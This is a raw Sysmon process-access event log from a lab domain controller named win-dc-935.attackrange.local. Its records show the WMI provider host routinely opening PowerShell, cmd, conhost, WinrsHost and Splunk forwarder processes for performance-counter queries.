13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005049Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005048Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005047Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005046Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005045Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005044Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005043Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005042Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005041Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005040Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005039Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005038Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005037Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005036Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005035Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005034Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 